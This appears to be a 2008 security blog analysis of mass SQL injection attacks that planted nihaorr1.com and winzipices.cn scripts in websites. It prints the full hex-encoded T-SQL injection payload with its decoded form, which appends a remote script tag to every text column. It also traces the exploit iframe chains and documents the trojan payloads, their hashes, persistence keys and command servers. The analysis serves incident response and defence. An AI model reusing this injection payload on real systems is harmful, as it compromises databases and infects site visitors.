DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);

The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'' script src=http: //www[dot]nihaorr1[dot]com/1.js script ''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

nihaorr1.com site code:
The injected script www[dot]nihaorr1[dot]com/1.js returns an iframe redirect to 1.htm

1.htm returns 4 IFRAMEs to exploit code (Yahoo.php, Ms07004.htm, Ajax.htm, Ms06014.htm). The code attempts to exploit MS06-014 (MDAC) and MS07-004 (VML) vulnerabilities. The payload for all of the exploits is http: //61[dot]188[dot]39[dot]214/1.exe, which is detected as a Infostealer.Onlinegame (Symantec) variant.

malware analysis:

Filename: 1.exe
MD5: 611D5549A73E1212D2F09F91A5004654
Size: 69632 bytes

1.exe creates:

C:\WINDOWS\system32\sonp32drv.dll

Filename: sonp32drv.dll
MD5: 7C73E2EB43D1C5A98A9DD3623188B2CE
Size: 45056 bytes

The following registry keys are created:

HKEY_CLASSES_ROOT\CLSID\{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\sonp32drv.dll
HKEY_CLASSES_ROOT\CLSID\{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}"
Type: REG_SZ

The malware deletes c:\WINDOWS\system32\drivers\etc\hosts

The malware sends exfiltrated data to 61.188.39.214 (China) TCP port 2034.

winzipices.cn SQL injection

2008-05-12T11:40:00.007-04:00

Mass SQL injection attacks continue....

SQL Injection:

Injected SQL statement:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F00770069006E007A006900700069006300650073002E0063006E002F0033002E006A00730022003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S)

The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''script src="http: //winzipices[dot]cn/3.js" script''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

The SQL injection appears to come from the automated CLI/SQL injection tool referenced at SANS. The user-agent utlilized during injection was: Mozilla/3.0+(compatible;+Indy+Library)

winzipices.cn site code:
injected script: http: //winzipices[dot]cn/3.js

3.js returns iframe for http: //winzipices[dot]cn/3.asp

3.asp returns iframes for pp.htm and s.asp and a tracking script for http: //s126[dot]cnzz[dot]com/stat.php?id=888134&web_id=888134&show=pic1

pp.htm returns script reference for pp.js

pp.js does a browser check. IE6 goes to 6.gif, IE7 goes to 7.gif

6.gif returns a script reference for vv.js and iframes for le.gif, old.gif and xin.gif

7.gif returns iframes for old.gif and xin.gif

le.gif and vv.js return MDAC (MS06-014) exploit
old.gif returns RealPlayer exploit (CVE-2007-5601)
xin.gif returns RealPlayer exploit (CVE-2008-1309)

Payload for all is: http: //61[dot]188[dot]38[dot]158/images/test.exe

malware analysis:

Filename: test.exe
MD5: afdb42512a91ae960d07397226f24494
Size: 27.5 KB (28,237 bytes)

The file test.exe copies itself as c:\WINDOWS\Tasks\0x01xx8p.exe and hooks itself into spoolsv.exe

receives instructions from http: //766598[dot]com/config.txt (222.187.105.196).

GET /config.txt HTTP/1.1
User-Agent: Downing
Host: 766598.com
Cache-Control: no-cache

config.txt returns commands for several connections:
http: //61[dot]188[dot]38[dot]158/images/test.exe
http: //winzipices[dot]cn/1.exe
http: //766598[dot]com/tongji/post.asp

new test.exe:
Filename: test.exe
MD5: 8ca53bf2b7d8107d106da2da0f8ca700
Size: 27.5 KB (28,237 bytes)

Filename: 1.exe (PSW.OnlineGames trojan)
MD5: 5c9322a95aaafbfabfaf225277867f5b
Size: 37.5 KB (38,400 bytes)

1.exe creates 3 tmp files: datx.tmp (x = number) with hooks into winlogin.exe

Filename: dat6.tmp
MD5: 96ee4d2d791d123c87692a5e838ed549
Size: 12.0 KB (12,288 bytes)

Filename: dat7.tmp
MD5: 9473d4397a0793c709a4ec365fb3f0d3
Size: 21.5 KB (22,016 bytes)

Filename: dat8.tmp
MD5: 69d308d862fefa4548d87545b387dda9
Size: 6.50 KB (6,656 bytes)

Registry:
HKEY_CLASSES_ROOT\CLSID\{E25C29AB-12B9-4523-A53C-324B5FBA648C}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp
Data:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Shell"
Type: REG_SZ
Data: "C:\WINDOWS\System32\Rundll32.exe" "C:\WINDOWS\System32\shell32.dll",Control_RunDLL "C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp"

...all in an effort to drop a PSW.OnlineGames trojan